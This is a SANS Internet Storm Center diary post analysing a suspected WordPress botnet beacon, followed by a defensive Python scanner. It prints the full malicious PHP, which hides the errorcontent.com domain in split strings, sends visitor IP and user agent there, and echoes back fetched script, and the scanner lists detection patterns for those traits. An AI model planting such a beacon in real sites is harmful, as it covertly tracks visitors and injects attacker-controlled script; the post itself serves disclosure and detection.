SANS ISC Internet Storm Center

Possible Wordpress Botnet C&C: errorcontent.com

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)

Thanks to one of our readers for sending us this snippet of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */

/* only run the code if this is Chrome or IE and not a "bot" */
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{
  # Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
  $wp_mezd098610 = "http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

  # check if we have the curl extension installed
  if (function_exists('curl_init') && function_exists('curl_exec')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wp_mezd098610);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_8610mezd = curl_exec($ch);
    curl_close($ch);
  }
  # if we don't have curl, try file_get_contents which requires allow_url_fopen.
  elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }
  # or try fopen as a last resort
  elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, "r")); }
}

/* substr offset 1, length 3: the check passes for a response such as "<script..." */
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }
# The data retrieved will be echoed back to the user if it starts with the string "scr".

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
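For anyone auditing a Wordpress install for this kind of beacon, the traits worth scanning for are the domain split across concatenated literals, the silenced errors, the user-agent gating and the echo of fetched content. The Python scanner below is an added example (not part of the diary or the reader's submission) that reassembles the concatenated literals to expose the hidden host and flags those traits; its sample input is a constructed reduction of the snippet above.

```python
import re

# Constructed sample: the key lines of the snippet from the diary, with the C&C
# domain split across concatenated literals exactly as the original does.
SAMPLE_PHP = r'''
error_reporting(0);
@ini_set('display_errors',0);
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($wp_mezd8610);
  if (function_exists('curl_init') && function_exists('curl_exec')) {
    $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_mezd098610);
    $wp_8610mezd = curl_exec($ch); curl_close($ch);
  }
}
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }
'''

# "abc" . "def" -> "abcdef". Handles only plain literals (no escapes or embedded
# quotes), which is all this snippet uses; loops until no pair is left to merge.
_CONCAT = re.compile(r'''(["'])([^"'\\]*)\1\s*\.\s*(["'])([^"'\\]*)\3''')

def join_concatenated_literals(src: str) -> str:
    while True:
        merged = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
        if merged == src:
            return merged
        src = merged

# Traits of this snippet that a legitimate theme or plugin file should not combine.
INDICATORS = {
    "errors_silenced": r"error_reporting\s*\(\s*0\s*\)",
    "user_agent_gated": r"HTTP_USER_AGENT",
    "bot_excluded": r"!\s*preg_match\s*\(\s*['\"]/bot/i['\"]",
    "remote_fetch": r"\b(?:curl_exec|file_get_contents|stream_get_contents)\s*\(",
    "echoes_script_tag": r"substr\s*\([^)]*,\s*1\s*,\s*3\s*\)\s*===?\s*['\"]scr['\"]",
    "obfuscated_wp_vars": r"\$wp_[a-z0-9]*\d[a-z0-9]*",
}

def scan_php(src: str) -> dict:
    """Reassemble split literals, pull out the hosts they hide, flag the traits."""
    joined = join_concatenated_literals(src)
    hosts = sorted(set(re.findall(r"https?://([a-z0-9.-]+)", joined, re.I)))
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, joined)]
    # A hidden host plus at least three of the traits is what this beacon looks like.
    return {"hosts": hosts, "indicators": hits,
            "suspicious": bool(hosts) and len(hits) >= 3}
```

Run `scan_php()` over each `.php` file under the web root; a hit on a theme or plugin file that should not be talking to outside hosts is the one to pull for closer review.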

---
Johannes B. Ullrich, Ph.D.
